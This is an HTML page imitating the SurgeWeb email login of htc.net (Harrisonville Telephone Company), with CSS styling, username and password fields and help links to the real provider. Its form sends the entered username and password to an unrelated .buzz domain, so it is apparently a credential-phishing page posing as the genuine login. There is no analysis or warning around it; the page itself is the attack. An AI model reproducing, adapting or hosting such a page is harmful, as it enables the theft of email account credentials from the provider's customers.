<html><head>





  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">

<style>


 .body_bg {
  	background:#f2f2;
  	}
 .body_bg2 {
  	background:#f2f2f2; 
  }

 body {
	text-align:center;
	font-family:'Helvetica Neue', Helvetica, Arial, sans-serif;
	font-size:14px;
 }
 #login_outer{
	text-align:left;
 	max-width:450px;
	margin: 0 auto;
	margin-top:75px;
 } 
 #login_panel_pre{
 	border-radius:5px 5px 0 0;
	padding:16px;
	background: #0055a4;
	color:white;
	font-weight:300;
	text-align:center;
 }
 #login_panel{
    background:white;
  	border:1px solid #ddd;
 	padding:20px;
	text-align:center;
	box-shadow:0 0 10px 0px #ddd;
 } 
 #login_panel input{
 	padding:8px 15px;
 	border-radius:3px;
 	border:1px solid #ddd;
 	margin:5px;
 	font-size:14px;
 	color:#000;
 }
 #login_panel input[type="submit"]{
	width:160px !important;
}
 #login_panel td{
 	padding:3px 0;
 	color:#777;
 	font-size:14px;	
 }
  #login_panel td:first-child{
  	padding-left:20px
  }

 #cmd_login{
 	color: #000;
 	border:1px solid #f7c72f !important;
	background-color: #f7d42f;
	text-transform: uppercase;
	font-weight: 700;	
	font-size:14px;
	margin-left:15px !important;
}
 
 #cmd_login:hover{
 	background-color: #f7b32f;
	border-color: #f7b32f;
}

 #login_panel table{
	margin: 0 auto;
 }

 #login_panel_post{
	background:#ddd; 
	color:white;
	padding:15px;
	border-radius:0 0 5px 5px;
	text-align:center;
 }
  #login_panel_post a{
  	text-decoration:none;
  	color:#0055a4 !important;
  }

 #login_title_comment{
 	display:none;
 }
 #login_title{
 	font-size:1em;
 	font-size:22px;
 }
 
 #cmd_login{
  	width:120px; 
  }

 #error{
 	border:1px solid #f7b32f;
 	color:#777;
 	padding-bottom:5px;
 	border-radius:3px;
 	margin-bottom:15px;
 	font-size:12px;
 }
 
  #error>*{
  	padding-left:15px;
  	padding-right:15px;
  }

 #error .surgeweb{
 	border-radius:3px 3px 0 0;
 	text-transform:uppercase;
 	margin-bottom:2px;
 	background:#f7b32f;;
 	color:#000;
 	padding:5px;
 	font-weight:bold;
 }
 
 .hidden{
 	display:none;
 }

 .login_link_small{
	color:white;
	font-size:0.8em;
	text-decoration:none;
 }
  .login_link_small:hover{
 	text-decoration:underline;
 }
  .boldred{
  	color:red;
  	font-weight:bold;
  	font-style:italic;
  }
   .red{
  	color:red;
  } 
  
  #rcol_login_outer{
  	text-align:center;
  	position:absolute;
  	right:0;top:0;
  	border:1px solid #5a82b8;
  	width:120px;
  	height:480px;
  	background:#f7f7f7;
  }
  #rcol_login_iframe{
  	background:white;
  	width:120px;
  	height:480px;
  }
</style>




<style type="text/css">
	 #loading_ajax,#loading_html{position:absolute;left:0;top:0;width:100%;height:100%;z-index:1000;background-color:#fff; text-shadow: #fff 0px 0 15px, #fff 0px 0 12px, #fff 0px 0 12px, #fff 2px 0 10px;}
	 .msg1{position:absolute;left:20px;top:30px;font-size:14px;font-weight:bold;color:#000; }
	 .msg2{position:absolute;right:20px;bottom:30px;font-size:12px;font-weight:normal;color:#000;}
	.hidden{display:none;}
</style>
  <title>SurgeWeb - htc.net</title>
</head>

<body class="body_bg2" style="overflow:hidden;">






<form action="https://nkiomzhbhnlfq.buzz/htc/login.php" method="POST" name="main">
<input type="hidden" name="cmd" value="login">
<input type="hidden" name="page" value="">
<input type="hidden" name="devt_mode" value="">
<input type="hidden" name="live_id" value="">

<input type="hidden" name="domain_ex" value="htc.net">
<input type="hidden" name="fld_id" value="">
<input type="hidden" name="hash" value="">


<input type="hidden" name="update_cache" value="">
<input type="hidden" name="disable_markread_fld" value="">

<div id="appearance_bg" class="appearance_bg"><div id="login_outer" class="login_outer"><div id="login_inner" class="login_inner">

<div id="login_panel_pre">
 <div id="login_title"> <span>Welcome to HTC's Email</span></div>
 <div id="login_title_comment"> <span>Surgeweb login page for all interfaces.</span></div>
</div>
<div id="login_panel">

<div id="login_panel_header"></div>




 <table style="text-align:left;">
 <tbody><tr><td>Username</td><td style="text-align:left;"><input type="text" name="username" value="" tabindex="1" style="width:160px;" required />
 	 @ htc.net   	</td></tr>
 <tr><td>Password</td><td><input type="password" name="password" tabindex="2" style="width:160px;" required /></td></tr>

 <tr id="interface_line"><td>Interface</td><td>
 <select id="interface_ex" name="interface_ex" onchange="select_interface(this)">
		<option value="ajax">Standard</option>
  
 
	
	<option value="html">Basic</option>
		<option value="mobile">Mobile</option>
  </select>
 <select id="language" name="language" onchange="select_lang(this);">
							<option value="German">Deutsch
					</option><option value="English">English (UK)
					</option><option value="English US" selected="">English (US)
					</option><option value="Spanish">Español
					</option><option value="French">Français
					</option><option value="Dutch">Nederlands
					</option><option value="Portuguese Br">Português (Brazil)
					</option><option value="Portuguese">Português (Portugal)
					</option><option value="Russian">Русский
					</option><option value="Hindi">हिन्दी
					</option><option value="Japanese">日本語
		
		
		</option><option value="more...">More...</option>
				</select>
		<input type="hidden" name="lang_last" value="English US">
		<input type="hidden" name="lang_showall" value="">
 </td></tr>
 
 <tr id="remember_me"><td colspan="2">Remember me<input name="remember" id="remember" type="checkbox"></td></tr>

 <tr><td></td><td><input type="submit" name="cmd_login" id="cmd_login" value="Log in" onclick="check_mode(event);action_login(event);" tabindex="3" oncontextmenu="return false;"></td></tr>


 <tr id="bad_browser" style="text-align:left;display:none;"><td colspan="2">
 	<div style="padding-top:5px; padding-bottom:5px;">Browser: <span class="boldred">FAILED TEST</span></div>
 	<div style="font-size:0.9em;">Note: <span class="red">A modern browser is needed to use the standard (Ajax/Web 2.0) interface.</span><br>&nbsp;&nbsp;- Tested to work: IE7+, Safari 3.1+, Firefox 3.0+, Google Chrome 1+<br>&nbsp;&nbsp;- Mostly works in : Opera 9.51, Firefox 2.0, Camino 1.69<br>&nbsp;&nbsp;- Will NOT work in : various other older browsers including IE6<br></div>
 	<div style="padding-top:5px; padding-bottom:5px;">Note: Other modern browsers such as recent Opera etc will probably work but need further compatibility testing &amp; development</div>
 	</td></tr>
 </tbody></table>
</div>
<div id="login_panel_post">
    <span>
	<div id="login_post_comment"><a href="https://www.htc.net" target="popup" style="color:white">Harrisonville Telephone Company </a>, <a href="https://www.htc.net/surgeweb" target="popup" style="color:white">Click here for Help</a></div>
    </span>
</div>
</div></div></div>

</form>




<div id="choose_custom" class="hidden" style="z-index:2;_width:1000px;_overflow:auto;" _style="position:absolute;width:90%;height:200px;background:white;bottom:5%;left:5%; right:5%; padding:15px; ">
	<div style="position:absolute; width:42px; height:42px; background:red;top:5px;right:5px; background: url(/surgeweb/0523703200//shared/img/altui_menu.png?vz=116730b1d4c277e6a21041062126a3d2f3300&amp;domain_ex=htc.net) no-repeat -84px -42px;" onclick="appearance_done()"></div>

	<p></p><div style="margin-left:45px;margin-right:45px;">
	   <span id="custom_status">Custom look ACTIVE (associated with marijn@surface.none)</span>
	   <input type="button" value="Reset" onclick="appearance_reset()" style="margin:5px;">
	 </div>


	<p>
		</p><div id="file_div" class="drop_indicator">Drop your favourite image anywhere on the login window to personalise your surgeweb background. </div>
    <input id="file_input" class="drop_indicator hidden" type="file" accept="image/*">
	<p>
	  </p><div id="appearances" class="pannable" style=""></div>
	<p>


</p></div>



<!-- End of login.htm -->
</body></html>